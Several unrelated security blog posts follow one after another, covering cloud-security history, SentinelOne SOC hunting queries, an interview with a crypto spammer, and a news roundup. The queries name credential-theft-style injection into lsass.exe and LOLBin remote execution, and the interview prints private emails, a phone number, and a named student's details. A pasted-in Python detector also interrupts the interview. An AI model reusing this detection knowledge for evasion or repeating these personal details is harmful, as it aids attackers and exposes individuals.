Now that the idea and benefits of cloud technology gained widespread attention, the tech giants of the day focused on relieving businesses of the big investments needed for computing hardware and expensive server maintenance. Amazon Web Services (AWS), and later, Google Docs and Microsoft’s Azure and Office 365 suite all provided an eager market with more and more features and ways to rely on cloud computing.

However, the accelerating rates of data being stored in the cloud bred the beginnings of a widening attack surface that would signal decades of cloud-based cyber risks and attacks for many businesses. Cyberattacks on the cloud during this time mostly targeted individual computers, networks, and internet-based systems. These included:

  • Malware Attacks – Malicious software, such as viruses, worms, and trojans, was prevalent in this decade. These attacks often spread through email attachments, infected software, or compromised websites and posed significant risks to individual computer systems connected to the internet and cloud.
  • Network Exploits – Exploits targeting vulnerabilities in network protocols and services were common in the 1990s. Attackers would exploit weaknesses in network infrastructure, operating systems, or software applications to gain unauthorized access, perform privilege escalation, or conduct data exfiltration.
  • Social Engineering Attacks – Social engineering attacks, such as phishing and impersonation, were prevalent throughout the 90s. Attackers would manipulate users through deceptive tactics to trick them into revealing sensitive information, such as login credentials or financial details.

Cloud security in this decade thus focused on network security and access management. Dedicated attacks targeting cloud environments became more prominent in the following decades as cloud computing gained traction across various industries.

The Roaring 2000s | The Millennial Age of Cloud Security

In the 2000s, the cybersecurity landscape continued to evolve rapidly, and the specific types and sophistication of attacks targeting cloud environments expanded. Cloud computing was becoming more popular, and cyberattacks specifically targeting cloud environments started to emerge. This decade marked a new stage of cloud security challenges directly proportional to the significant increase in the adoption of cloud.

While past its infancy, cloud computing was not as prevalent as it is now, and many businesses still relied on traditional on-premises infrastructure for their computing needs. Consequently, the specific security concerns related to cloud environments were not widely discussed or understood.

Cloud security measures in the 2000s were relatively basic compared to today’s standards. To secure network connections and protect data in transit, cloud security measures focused primarily on Virtual Private Networks (VPNs), commonly used to establish secure connections between on-premises infrastructure and the cloud provider’s network. Further, organizations relied heavily on traditional security technologies that were adapted for these new cloud environments. Firewalls, intrusion detection systems, and access control mechanisms were employed to safeguard network traffic and protect against unauthorized access.

The 2000s also saw few industry-specific compliance standards and regulations explicitly addressing cloud security. Since compliance requirements were generally focused on traditional on-premises environments, many businesses had to find their own way, testing out combinations of security measures through trial and error since there were no standardized cloud security best practices.

Cloud security at the beginning of the millennium was largely characterized by limited control and visibility and heavily reliant on the security measures implemented by the cloud service providers. In many cases, customers had limited control over the underlying infrastructure and had to trust the provider’s security practices and infrastructure protection. This also meant that customers had limited visibility over their cloud environments, adding to the challenge of monitoring and managing security incidents and vulnerabilities across the cloud infrastructure.

The 2010s | Cloud Security Gaining A Global Momentum

In the 2010s, cloud security experienced significant advancements as cloud computing matured and became a staple of many businesses’ infrastructures. In turn, attacks on the cloud surface had also evolved into much more sophisticated and frequent events.

Data breaches occupied many news headlines in the 2010s, with attackers targeting cloud environments for cryptojacking or to gain unauthorized access to sensitive data. Many companies fell victim to compromises that leveraged stolen credentials, misconfigurations, and overly permissive identities. A lack of visibility into the cloud surface meant breaches could go undiscovered for extended periods.

Many high-profile breaches exposed large amounts of sensitive data stored in the cloud including:

  • 150 million breached records from Adobe found on a hacker site in 2013,
  • The Apple iCloud breach in 2014 resulting in a mass amount of private photos leaked,
  • 300 million compromised Facebook accounts found listed for sale on the dark web in 2019, and
  • 100 million credit card customers affected by a breach at Capital One in 2019.

The severity of cloud-based attacks led to increased awareness of the importance of cloud security. Organizations recognized the need to secure their cloud environments and began implementing specific security measures. As cloud adoption continued to grow, so did the motivation for attackers to exploit cloud-based infrastructure and services. Cloud providers and organizations responded by increasing their focus on cloud security practices, implementing stronger security controls, and raising awareness of globally recognized countermeasures.

Enter the Cloud Shared Responsibility Model. Introduced by cloud service providers (CSPs) to clarify the division of security responsibilities between the CSP and the customers utilizing their services, the model gained significant prominence and formal recognition in the 2010s.

During this period, major providers such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP) began emphasizing the shared responsibility model as part of their cloud service offerings. They defined the respective security responsibilities of the provider and the customer, outlining the areas for which each party was accountable. This model helped a generation of businesses better understand their role in cloud security and enabled them to implement appropriate security measures to protect their assets.

This decade also popularized the services of cloud access security brokers (CASBs), a term coined by Gartner in 2012 and defined as:

“On-premises, or cloud-based security policy enforcement points, placed between cloud service consumers and cloud service providers to combine and interject enterprise security policies as the cloud-based resources are accessed. CASBs consolidate multiple types of security policy enforcement. Example security policies include authentication, single sign-on, authorization, credential mapping, device profiling, encryption, tokenization, logging, alerting, malware detection/prevention and so on.”

To help businesses navigate and address the changing cloud security landscape, CASBs emerged as a critical security solution for organizations, acting as intermediaries between cloud service providers and consumers. Their main goals were to provide visibility, control, and security enforcement across cloud environments through services such as data loss prevention (DLP), cloud application discovery, encryption and tokenization, compliance, and governance.

The 2010s saw the emergence of Cloud Security Posture Management solutions and was also the starting point for improved compliance and standardization for the use of cloud in modern businesses. Industry-specific compliance standards and regulations began to address cloud security concerns more explicitly. Frameworks such as the Cloud Security Alliance (CSA) Cloud Controls Matrix and both ISO 27017 and ISO 27018 now sought to provide guidelines for cloud security best practices.

The 2020s | Paving the Future of Cloud Security

In current times, cloud technology has laid down a foundation for a modern, digital means of collaboration and operations on a large scale. Especially since the COVID-19 pandemic and the rise of remote workforces, more businesses than ever before are moving towards hybrid or complete cloud environments.

While cloud technologies, services, and applications are mature and commonly used across all industry verticals, security leaders are still facing challenges of securing this surface and meeting new and developing threats. Modern businesses need a cloud posture management strategy to effectively manage and secure their cloud environments. This involves several key elements to ensure agile and effective protection against today’s cloud-based risks.

Cloud Security Posture Management (CSPM)

CSPM solutions have now gained a large amount of traction, enabling organizations to continuously assess and monitor their cloud environments for security risks and compliance. CSPM tools offer visibility into misconfigurations, vulnerabilities, and compliance violations across cloud resources, helping organizations maintain a secure posture.

An essential element of CSPM is cloud attack surface management. Since cloud environments introduce unique security challenges, a cloud posture management strategy helps businesses assess and mitigate risks. It allows organizations to establish and enforce consistent security controls, monitor for vulnerabilities, misconfigurations, and potential threats, and respond to security incidents in a timely manner. A robust strategy enhances the overall security posture of the cloud infrastructure, applications, and data.

CSPM also encompasses what’s called the “shift-left” paradigm, a cloud security practice that integrates security measures earlier in the software development and deployment lifecycle. Rather than implementing security as a separate and downstream process, the shift left addresses vulnerabilities and risks at the earliest possible stage, reducing the likelihood of security issues and improving overall security posture. It emphasizes the proactive inclusion of security practices and controls from the initial stages of development, rather than addressing security as an afterthought or at later stages.

In addition, Cloud Infrastructure Entitlement Management (CIEM) tools have emerged to help organizations manage access entitlements across multicloud environments, helping to reduce the risks associated with excessive permissions.

Kubernetes Security Posture Management (KSPM)

As cloud adoption rates continue to increase, many businesses have turned to Kubernetes (K8s) to help orchestrate and automate the deployment of containerized applications and services. K8s has risen as a popular choice for many security teams that leverage its mechanism for reliable container image build, deployment, and rollback, which ensures consistency across deployment, testing, and production.

To better assess, monitor, and maintain the security of K8s, teams often use the Kubernetes Security Posture Management (KSPM) framework to evaluate and enhance the security posture of Kubernetes clusters, nodes, and the applications running on them. It involves a combination of activities including risk assessments of the K8s deployment, configuration management for the clusters, image security, network security, pod security, and continuous monitoring of the Kubernetes API server to detect suspicious or malicious behavior.

Additionally, Cloud Workload Protection Platforms (CWPPs) and runtime security help protect workloads against active threats once the containers have been deployed. Implementing K8s runtime security tools protects businesses from malware that may be hidden in container images, privilege escalation attacks exploiting bugs in containers, gaps in access control policies, and unauthorized access to sensitive information that running containers can read.

Zero Trust Architecture

The zero trust security model has gained prominence in the 2020s. It emphasizes the principle of “trust no one” and requires authentication, authorization, and continuous monitoring for all users, devices, and applications, regardless of their location or network boundaries. Zero trust architecture helps mitigate the risk of unauthorized access and lateral movement within cloud environments.

Implementing the zero trust security model means taking a proactive and robust approach to protecting cloud environments from evolving cyber threats. Compared to traditional network security models, which relied on perimeter-based defenses and assumed that everything inside the network was trusted, zero trust architecture:

  • Eliminates the concept of implicit trust to minimize the risk of unauthorized access, data breaches, and lateral movement within the infrastructure.
  • Makes identity the cornerstone of security by focusing on strong authentication mechanisms.
  • Enables fine-grained access controls, allowing organizations to enforce access policies based on various contextual factors such as user roles, device health, location, and behavior.
  • Leverages technologies like user and entity behavior analytics (UEBA), threat intelligence, and real-time monitoring to detect anomalous behavior, potential threats, and security incidents.
  • Promotes the use of encryption and data protection mechanisms to secure data within cloud environments, using end-to-end encryption for data in transit and at rest to protect sensitive information from unauthorized access or interception.

Cloud-Native Security Tools, Continuous Monitoring & Incident Response

Cloud-native security solutions continue to evolve, providing specialized tools designed specifically for cloud environments. These tools offer features such as cloud workload protection, container security, serverless security, and cloud data protection. Many businesses leverage cloud-native tools to address the unique challenges of modern cloud deployments in a way that is scalable, effective, and streamlined to work in harmony with existing infrastructure.

Cloud-native security tools often leverage automation and orchestration capabilities provided by cloud platforms. Based on predefined templates or dynamically changing conditions, they can automatically provision and configure security controls, policies, and rules to reduce manual effort. Since many cloud breaches are the result of human errors, such tools can help security teams deploy consistent and up-to-date security configurations across their businesses’ cloud resources.

Continuous monitoring of cloud environments is essential for early threat detection and prompt incident response. Cloud-native security tools enable centralized monitoring and correlation of security events across cloud and on-premises infrastructure. As they are designed to detect and mitigate cloud-specific threats and attack vectors, cloud-native solutions can cater to characteristics of cloud environments, such as virtualization, containerization, and serverless computing, identifying the specific threats targeting these technologies.

Cloud Security Intelligence Using AI & ML

The use of advanced analytics, threat intelligence, artificial intelligence (AI) and machine learning (ML) is on the rise in cloud security. These technologies enable the detection of sophisticated threats, identification of abnormal behavior, and proactive threat hunting to mitigate potential risks.

Both AI and ML are needed to accelerate the quick decision-making process needed to identify and respond to advanced cyber threats and a fast-moving threat landscape. Businesses that adopt AI and ML algorithms can analyze vast amounts of data and identify patterns indicative of cyber threats. They can detect and classify known malware, phishing attempts, and other malicious activities within cloud environments.

By analyzing factors such as system configurations, vulnerabilities, threat intelligence feeds, and historical data, the algorithms allow security teams to prioritize security risks based on their severity and potential impact. This means resources can be focused on addressing the most critical vulnerabilities or threats within the cloud infrastructure.

From a long-term perspective, the adoption of AI and ML in day-to-day operations enables security leaders to build a strong cloud security posture through security policy creation and enforcement, ensuring that policies adapt to changing cloud environments and truly address emerging threats.

Conclusion

Securing the cloud is now an essential part of a modern enterprise’s approach to risk and cyber threat management. By understanding how the cloud surface has evolved, businesses can better evaluate where they are on this development path and where they are headed. Business leaders can use this understanding to ensure that the organization’s security posture includes a robust plan for defending and protecting cloud assets. By prioritizing and investing in cloud security, enterprises can continue to safeguard their organizations against developing threats and build a strong foundation for secure and sustainable growth.

How SentinelOne’s AI-Powered Platform Supports Cloud Security Strategies

SentinelOne focuses on acting faster and smarter through AI-powered prevention and autonomous detection and response. SentinelOne’s Singularity™ Cloud ensures organizations get the right security in place to continue operating in their cloud infrastructures safely.

Learn more about how Singularity helps organizations autonomously prevent, detect, and recover from threats in real time by contacting us or requesting a demo.

Singularity Cloud
Simplifying security of cloud VMs and containers, no matter their location, for maximum agility, security, and compliance.

SOC Team Power Up | 7 Practical Tips To Find and Stop Threats Faster with SentinelOne

In our recent series on Mastering the Art of SOC Analysis, we explored how aspiring SOC Analysts can develop the skills needed in today’s complex threat environment, from learning fundamentals like network and malware analysis to understanding cloud security and effective internal and external communication.

Essential to every SOC analyst is having the right tools and knowing how to use them to their full potential. Many SOCs worldwide partner with SentinelOne to maximize their resources and accelerate their ability to respond to incidents, hunt for threats and be more effective in securing the enterprise.

In this blog post, we share seven practical tips analysts can use within the SentinelOne console to power up day-to-day operations and find and stop attacks fast.

1. Leverage PowerQuery to Hunt for Abnormal Activities

In the past, SOC personnel needed to hunt for one IOC at a time, spending time trying to correlate it back to a meaningful activity. Today, analysts can be much more effective, and even spend time in proactive hunting with the help of PowerQuery.

Here are a few examples to understand the power of this.

A non-Windows process writes files to the temp directory

AgentOS = "windows" and objectType = "file" and FileFullName Contains Anycase "temp" and FileIsExecutable IS TRUE and SrcProcVerifiedStatus != "verified" AND SrcProcPublisher != "MICROSOFT WINDOWS"

Rundll or Regsvr executes a script

(SrcProcDisplayName = "Windows host process (Rundll32)" or SrcProcDisplayName = "Microsoft(C) Register Server") AND SrcProcCmdLine RegExp ".*(javascript|mshtml|runhtmlapplication).*"

Bat or cmd files are dropped directly to a temp folder

objectType = "file" and FileFullName containscis "windows\temp" and (filefullname endswithcis ".bat" or filefullname endswithcis ".cmd") and FileFullName RegExp "windows\\temp\\[^\\]+$"

A non-Windows process injects to a Windows process

(SrcProcVerifiedStatus != "verified" AND SrcProcPublisher != "MICROSOFT WINDOWS" AND TgtProcVerifiedStatus = "verified" AND TgtProcPublisher != "MICROSOFT WINDOWS" and ObjectType = "cross_process") or (indicatorName = "RemoteInjection" AND (IndicatorMetadata Contains Anycase "lsass.exe" or IndicatorMetadata Contains Anycase "explorer.exe" or IndicatorMetadata Contains Anycase "svchost.exe"))

Cmd runs with /c and LOLBins for remote execution

SrcProcCmdLine contains anycase "cmd" and SrcProcCmdLine contains anycase "/c" and SrcProcCmdLine RegExp "(at|sc|schtasks|wmic)(\s|"|.exe).*cmd.*\s/c\s"

How It Helps

PowerQuery allows analysts to easily identify suspicious activities that require investigation. It can be as simple or as powerful as you need it to be, offering a rich set of commands to transform and manipulate data as well as many pre-built templates. See the built-in documentation for more examples and comprehensive help on PowerQuery.

2. Track Every Login Attempt in Your Environment

Basic queries can be used to view real-time login data. These simple queries can be modified and scaled to your environmental needs. The idea is to provide open-ended queries where analysts can then down-select as they see fit.

Examples of such queries are:

endpointname contains "Goat" and LoginIsSuccessful is TRUE
endpointname contains "server" and LoginIsAdministratorEquivalent IS TRUE/FALSE

SOC teams can further utilize this to enrich their attack data and quickly perform mitigation and hunting steps such as:

  • Disable the compromised user
  • Pivot to Deep Visibility to hunt for other malicious activity by the compromised user
  • Potentially identify a vulnerable device by finding which machine belongs to the compromised user

How It Helps

Many incidents target individual hosts, from which attackers will attempt to further strengthen their access through lateral movement techniques. Monitoring login activity can help identify patterns of suspicious activity on the network. In the event of an incident, login data can help to more effectively identify the source and the extent of compromise.

3. Track Lateral Movement of Attackers

The ability to pivot from a single device point of view to an environment perspective allows the SOC analyst to see the big picture. In most cases, attackers are trying to expand their foothold and move laterally from one device to other components on the network. Tracking this activity can be done with the SentinelOne console in the following way.

The SentinelOne Console provides visibility into lateral movement events directly within the context of an attack chain.

Lateral Movement events can be viewed quickly by opening the Incidents widget in the left-hand navigation pane of the console. Results can be filtered via the ‘Threat Details’ free text search.

This view allows Lateral Movement events to be viewed exclusively, while also allowing analysts to ‘zoom out’ scope-wise to digest the full context of the event.

Analysts can also hunt for lateral movement events viewed in Storyline™ Additional Methods/DV Queries.

Further, PowerQuery can be leveraged in these scenarios, too. For example, attacks often create scheduled tasks to kickstart a lateral movement attack during work hours with privileges. Therefore, hunting for these events can lead to new discoveries or additional pivot points.

SrcProcCmdLine RegExp "shtasks" AND SrcProcName != "Manages scheduled tasks"

Similarly, Deep Visibility can be used to hunt for high-level network behaviors, while also excluding traffic originating from SentinelOne processes. This can also be a good ‘starting point’ for discovering and analyzing anomalies in internal network traffic.

(DstPort = "135" or DstPort = "5985" or DstPort = "5986") and (SrcProcDisplayName Does Not ContainCIS "svchost" and SrcProcDisplayName Does Not ContainCIS "SentinelOne")

How It Helps

Lateral movement is one of the most common techniques used by sophisticated actors. These tips can help analysts readily identify and stop lateral movement attempts in their environments.

4. Understand the Scope of a Security Incident or Breach Attempt

Experienced SOC engineers know the feeling of investigating something only to realize later it was a single attempt or even a false positive. However, when you have access to all your environment telemetry at your fingertips, the likelihood of a wild goose chase is reduced. When the analyst suspects there has been a security incident, use PowerQuery to perform the following steps to identify the scope of the issue:

  • Count the number of affected machines. This will give you an idea of how widespread the incident is.
  • Track the communication between infected machines and any malicious command and control servers to identify the malicious actors behind the attack.
  • Count failed login attempts by user name to identify potential initial access points used by the attackers.

How It Helps

Following these steps, analysts can quickly distinguish a major breach from an isolated event.

5. Find Hidden Threats by Examining Malicious Network Traffic

By analyzing network traffic, analysts can identify patterns or indicators that may point to malicious activity, such as communication with known malicious IP addresses or unusual port and protocol usage. Deep Visibility ensures analysts have full visibility into any artifacts dropped by specific URLs so they can assess whether they need to tweak firewall rules, denylist URLs, and so on.

Enter an ‘open-ended’ query to view all event data, both malicious and benign, and then filter down the results as needed. Example: EndpointName Contains "".

Next, click the ‘DNS’ tab to filter and view DNS request correlation.

From the table of results, scroll horizontally to the ‘URL’ column and view all URLs associated with each endpoint.

How It Helps

Deep Visibility can help the security team to quickly identify potential threats, such as malware, phishing, and other cyber attacks, and take appropriate action.

Analyzing network traffic also can reveal data exfiltration attempts, where attackers are trying to steal sensitive data from the network. This can allow you to quickly identify the affected systems and data, and take action to prevent further data loss.

6. Use Visual Layers for Faster Triage

SOC teams can speed up the triage process by expanding and moving freely between processes and their related graphs. The layering widget within Deep Visibility allows SOC analysts to maintain a cohesive visual context to support their investigations.

In the results table after a Deep Visibility search, if a process has a graph available, the name of the process shows with a hyperlink.

Click a link to open the graph in a new tab, then add or remove layers to the Process Graph via the Layers widget on the far right side of the XDR Process Graph.

Selected layers are indicated on relevant nodes in the XDR Process Graph:

How It Helps

By enabling layers, analysts can quickly understand what malware is doing through visual highlighting of behavioral indicators associated with each process.

7. Find Vulnerable Applications in Your Environment

Common Vulnerabilities and Exposures (CVEs) fulfill an essential role in the identification and detection of vulnerabilities in the threat landscape. CVE identification by SOC analysts allows organizations to document and prioritize vulnerabilities, assess their severity through comparison, and track their cyber resilience over time.

To streamline the many tasks SOC analysts are responsible for, the SentinelOne console automatically inventories applications on an organization’s endpoints. High risk and vulnerable endpoint devices are clearly noted and correlated to CVE IDs, which are made easily visible with the console view.

In the SentinelOne console, navigate to the ‘Application Management’ page to see an at-a-glance view of all associated CVEs.

Select filters to sort by CVE severity, CVSS score, remediation level, and more. Multiple levels of filtering can be applied at once.

Filtering can be done via the ‘Select Filters’ widget. Filtering criteria include Application Names, CVSS Score, Exploitability, Report Confidence and more.

How It Helps

Security and IT teams can use the Application Management view to identify vulnerable software and prioritize patch management.

Conclusion

Having the right people, with the right skills and the right tools is a large part of the battle in defeating the huge range of different cyber threats businesses now face. Ensuring that analysts are maximizing the tools at their disposal is critical. In this post, we’ve explored some of the ways that analysts can improve their productivity, efficacy and success in preventing, detecting and remediating threats.

There is a wealth of further information in the product documentation, including examples and further use cases. To find out more about how SentinelOne can empower your SOC team, contact us or request a free demo.

Interview With a Crypto Scam Investment Spammer

Social networks are constantly battling inauthentic bot accounts that send direct messages to users promoting scam cryptocurrency investment platforms. What follows is an interview with a Russian hacker responsible for a series of aggressive crypto spam campaigns that recently prompted several large Mastodon communities to temporarily halt new registrations. According to the hacker, their spam software has been in private use until the last few weeks, when it was released as open source code.

Renaud Chaput is a freelance programmer working on modernizing and scaling the Mastodon project infrastructure — including joinmastodon.org, mastodon.online, and mastodon.social. Chaput said that on May 4, 2023, someone unleashed a spam torrent targeting users on these Mastodon communities via “private mentions,” a kind of direct messaging on the platform.

The messages said recipients had earned an investment credit at a cryptocurrency trading platform called moonxtrade[.]com. Chaput said the spammers used more than 1,500 Internet addresses across 400 providers to register new accounts, which then followed popular accounts on Mastodon and sent private mentions to the followers of those accounts.

Since then, the same spammers have used this method to advertise more than 100 different crypto investment-themed domains. Chaput said that at one point last week the volume of bot accounts being registered for the crypto spam campaign started overwhelming the servers that handle new signups at Mastodon.social.

“We suddenly went from like three registrations per minute to 900 a minute,” Chaput said. “There was nothing in the Mastodon software to detect that activity, and the protocol is not designed to handle this.”

One of the crypto investment scam messages promoted in the spam campaigns on Mastodon this month.

Seeking to gain a temporary handle on the spam wave, Chaput said he briefly disabled new account registrations on mastodon.social and mastodon.online. Shortly after that, those same servers came under a sustained distributed denial-of-service (DDoS) attack.

Chaput said whoever was behind the DDoS was definitely not using point-and-click DDoS tools, like a booter or stresser service.

“This was three hours non-stop, 200,000 to 400,000 requests per second,” Chaput said of the DDoS. “At first, they were targeting one path, and when we blocked that they started to randomize things. Over three hours the attack evolved several times.”

Chaput says the spam waves have died down since they retrofitted mastodon.social with a CAPTCHA, those squiggly letter and number combinations designed to stymie automated account creation tools. But he’s worried that other Mastodon instances may not be as well-staffed and might be easy prey for these spammers.

“We don’t know if this is the work of one person, or if this is [related to] software or services being sold to others,” Chaput told KrebsOnSecurity. “We’re really impressed by the scale of it — using hundreds of domains and thousands of Microsoft email addresses.”

Chaput said a review of their logs indicates many of the newly registered Mastodon spam accounts were registered using the same OAuth credentials, and that a domain common to those credentials was quot[.]pw.
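The two signals Chaput describes, a sudden jump in signups per minute and many new accounts sharing one OAuth identity across many source IPs, can be pulled out of ordinary registration logs. The following is an added example, not Mastodon's code or anything Chaput's team ran; the log format, the placeholder domains spam-oauth.example and outlook.example, and the thresholds are assumptions.

```python
"""Flag a signup burst and shared-credential clustering in account-registration logs.

Constructed, simplified log format (not Mastodon's real log schema):
    <ISO-8601 UTC timestamp> <client IP> <account email> <OAuth identity or "-">
"""
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample: three ordinary signups, then 120 bot signups inside one minute
# from 120 distinct IPs, all carrying the same OAuth identity and the same mail domain.
# "spam-oauth.example" and "outlook.example" are placeholders, not real domains.
SAMPLE_LOG = (
    "2023-05-04T10:00:05Z 203.0.113.7 alice@example.org -\n"
    "2023-05-04T10:00:41Z 198.51.100.2 bob@example.net -\n"
    "2023-05-04T10:01:12Z 203.0.113.9 carol@example.com -\n"
    + "".join(
        f"2023-05-04T10:02:{i % 60:02d}Z 192.0.2.{i + 1} bot{i}@outlook.example spam-oauth.example\n"
        for i in range(120)
    )
)


def parse_signup_line(line):
    """Split one log line into a dict; raises ValueError on a malformed line."""
    ts, ip, email, oauth = line.split()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "ip": ip,
        "email": email,
        "oauth": oauth,
    }


def parse_log(text):
    return [parse_signup_line(line) for line in text.splitlines() if line.strip()]


def registrations_per_minute(events):
    """Count signups per wall-clock minute."""
    return Counter(e["ts"].replace(second=0, microsecond=0) for e in events)


def burst_minutes(events, baseline_per_minute=3, factor=10):
    """Minutes whose signup count is at least `factor` times the normal baseline.

    Defaults assume the ~3/minute baseline reported for mastodon.social and a
    10x jump as the alert threshold (the reported attack was a 300x jump).
    """
    threshold = baseline_per_minute * factor
    return sorted(m for m, n in registrations_per_minute(events).items() if n >= threshold)


def shared_credential_clusters(events, min_accounts=20):
    """Group signups by OAuth identity and by mail domain; return clusters large
    enough to look automated, with the number of distinct source IPs in each.

    A large cluster spread over many IPs is the signature of proxy-distributed
    bot registration rather than one misbehaving host.
    """
    groups = defaultdict(list)
    for e in events:
        if e["oauth"] != "-":
            groups[("oauth", e["oauth"])].append(e)
        groups[("email_domain", e["email"].rsplit("@", 1)[1].lower())].append(e)
    clusters = {}
    for key, evs in groups.items():
        if len(evs) >= min_accounts:
            clusters[key] = {"accounts": len(evs), "distinct_ips": len({x["ip"] for x in evs})}
    return clusters


def triage(log_text):
    """Run both checks and return what a signup-abuse alert would carry."""
    events = parse_log(log_text)
    return {"burst_minutes": burst_minutes(events), "clusters": shared_credential_clusters(events)}


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for minute in report["burst_minutes"]:
        print(f"signup burst at {minute:%H:%M} UTC")
    for (kind, value), stats in report["clusters"].items():
        print(f"{kind}={value}: {stats['accounts']} accounts from {stats['distinct_ips']} IPs")
```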

A DIRECT QUOT

The domain quot[.]pw has been registered and abandoned by several parties since 2014, but the most recent registration data available through DomainTools.com shows it was registered in March 2020 to someone in Krasnodar, Russia with the email address edgard011012@gmail.com.

This email address is also connected to accounts on several Russian cybercrime forums, including “__edman__,” who had a history of selling “logs” — large amounts of data stolen from many bot-infected computers — as well as giving away access to hacked Internet of Things (IoT) devices.

In September 2018, a user by the name “ципа” (phonetically “Zipper” in Russian) registered on the Russian hacking forum Lolzteam using the edgard0111012@gmail.com address. In May 2020, Zipper told another Lolzteam member that quot[.]pw was their domain. That user advertised a service called “Quot Project” which said they could be hired to write programming scripts in Python and C++.

“I make Telegram bots and other rubbish cheaply,” reads one February 2020 sales thread from Zipper.

Quotpw/Ahick/Edgard/ципа advertising his coding services in this Google-translated forum posting.

Clicking the “open chat in Telegram” button on Zipper’s Lolzteam profile page launched a Telegram instant message chat window where the user Quotpw responded almost immediately. Asked if they were aware their domain was being used to manage a spam botnet that was pelting Mastodon instances with crypto scam spam, Quotpw confirmed the spam was powered by their software.

“It was made for a limited circle of people,” Quotpw said, noting that they recently released the bot software as open source on GitHub.

Quotpw went on to say the spam botnet was powered by well more than the hundreds of IP addresses tracked by Chaput, and that these systems were mostly residential proxies. A residential proxy generally refers to a computer or mobile device running some type of software that enables the system to be used as a pass-through for Internet traffic from others.

Very often, this proxy software is installed surreptitiously, such as through a “Free VPN” service or mobile app. Residential proxies also can refer to households protected by compromised home routers running factory-default credentials or outdated firmware.

Quotpw maintains they have earned more than $2,000 sending roughly 100,000 private mentions to users of different Mastodon communities over the past few weeks. Quotpw said their conversion rate for the same bot-powered direct message spam on Twitter is usually much higher and more profitable, although they conceded that recent adjustments to Twitter’s anti-bot CAPTCHA have put a crimp in their Twitter earnings.

“My partners (I’m programmer) lost time and money while ArkoseLabs (funcaptcha) introduced new precautions on Twitter,” Quotpw wrote in a Telegram reply. “On Twitter, more spam and crypto scam.”

Asked whether they felt at all conflicted about spamming people with invitations to cryptocurrency scams, Quotpw said in their hometown “they pay more for such work than in ‘white’ jobs” — referring to legitimate programming jobs that don’t involve malware, botnets, spams and scams.

“Consider salaries in Russia,” Quotpw said. “Any spam is made for profit and brings illegal money to spammers.”

THE VIENNA CONNECTION

Shortly after edgard011012@gmail.com registered quot[.]pw, the WHOIS registration records for the domain were changed again, to msr-sergey2015@yandex.ru, and to a phone number in Austria: +43.6607003748.

Constella Intelligence, a company that tracks breached data, finds that the address msr-sergey2015@yandex.ru has been associated with accounts at the mobile app site aptoide.com (user: CoolappsforAndroid) and vimeworld.ru that were created from different Internet addresses in Vienna, Austria.

A search in Skype on that Austrian phone number shows it belongs to a Sergey Proshutinskiy who lists his location as Vienna, Austria. The very first result that comes up when one searches that unusual name in Google is a LinkedIn profile for a Sergey Proshutinskiy from Vienna, Austria.

Proshutinskiy’s LinkedIn profile says he is a Class of 2024 student at TGM, which is a Christian mission school in Austria. His resume also says he is a data science intern at Mondi Group, an Austrian manufacturer of sustainable packaging and paper.

Mr. Proshutinskiy did not respond to requests for comment.

Quotpw denied being Sergey, and said Sergey was a friend who registered the domain as a birthday present and favor last year.

“Initially, I bought it for 300 rubles,” Quotpw explained. “The extension cost 1300 rubles (expensive). I waited until it expired and forgot to buy it. After that, a friend (Sergey) bought [the] domain and transferred access rights to me.”

“He’s not even an information security specialist,” Quotpw said of Sergey. “My friends do not belong to this field. None of my friends are engaged in scams or other black [hat] activities.”

It may seem unlikely that someone would go to all this trouble to spam Mastodon users over several weeks using an impressive number of resources — all for just $2,000 in profit. But it is likely that whoever is actually running the various crypto scam platforms advertised by Quotpw’s spam messages pays handsomely for any investments generated by their spam.

According to the FBI, financial losses from cryptocurrency investment scams dwarfed losses for all other types of cybercrime in 2022, rising from $907 million in 2021 to $2.57 billion last year.

The Good, the Bad and the Ugly in Cybersecurity – Week 20

Cyber Sanctions | Russian National Faces Multiple Charges for Ransomware Operations

The US government has announced cyber-related sanctions on Mikhail Pavlovich Matveev, a Russian national also known online as Wazawaka, m1x, Boriselcin, and Uhodiransomwar. For his alleged involvement in targeted hijacking activities against American law enforcement, schools, and businesses, Matveev faces charges of conspiring to damage protected computers, conspiring to transmit ransom demands, and intentionally damaging protected computers. If convicted on all charges, he faces a prison term of at least 20 years.

Operating out of his native Russia, Matveev reportedly led several campaigns using LockBit, Babuk, and Hive ransomware since 2020, earning him some $200 million in ransom demands over the years. The DoJ’s press release noted that these campaigns have affected thousands of victims, including healthcare entities and government agencies. A reward of up to $10 million is offered for information leading to Matveev’s arrest, and he has been added to the FBI’s Most Wanted List.

LockBit, Babuk, and Hive ransomware all share a similar modus operandi: an intrusion via a vulnerable computer system, followed by data theft and encryption. Both LockBit and Hive are ransomware-as-a-service (RaaS) groups infamous for leveraging double extortion against their victims. While Hive was shut down by authorities earlier this year, LockBit ransomware continues to be prolific. As for Babuk, its source code was leaked two years ago and has since spawned at least ten new ransomware families. In an interview given last summer, Matveev confirmed that he was one of the original developers and administrators behind Babuk.

According to the U.S. Treasury, 75% of all ransomware-related incidents are traced back to Russian-backed attackers and the top five highest grossing variants available today are connected to Russian threat actors.

macOS Attacks | Increased Threat Level After Appearance of New Zero Days and Attack Frameworks

It’s been a busy week in macOS security. A Go-based implementation of Cobalt Strike Beacon called ‘Geacon’ was this week reported to be on the rise, while Apple issued patches across its operating system platforms for multiple software bugs, including three zero day vulnerabilities.

An open source port of well-known attack simulation kit Cobalt Strike was paid little attention when it debuted on GitHub some four years ago, but two forks of the Geacon project, Geacon Plus and Geacon Pro, which appeared late last year appear to be behind a rising number of sightings of Geacon in the wild.

SentinelOne’s report this week highlighted two examples of Geacon payloads being packaged inside fake macOS applications. One case featured an application bundle masquerading as SecureLink, a legitimate enterprise application used for remote support, with a Geacon Pro payload.

Late on Thursday, Apple also released fixes for three zero day bugs, CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373, in its WebKit browser engine, widely in use by Safari and other browsers across Apple’s platforms. CVE-2023-32409 is a sandbox escape that allows malicious code embedded in webpages to execute outside of its protected container. CVE-2023-28204 may enable attackers to access sensitive information on the device via maliciously crafted web content, and CVE-2023-32373 may lead to arbitrary code execution. In all three cases, Apple says it is aware of reports that the bugs may have been actively exploited.

The security flaws impact a wide range of Apple devices and operating system versions, and updates are available for Big Sur, Monterey and Ventura versions of macOS, as well as iOS, iPadOS, watchOS and tvOS. Users are urged to apply patches as soon as possible.

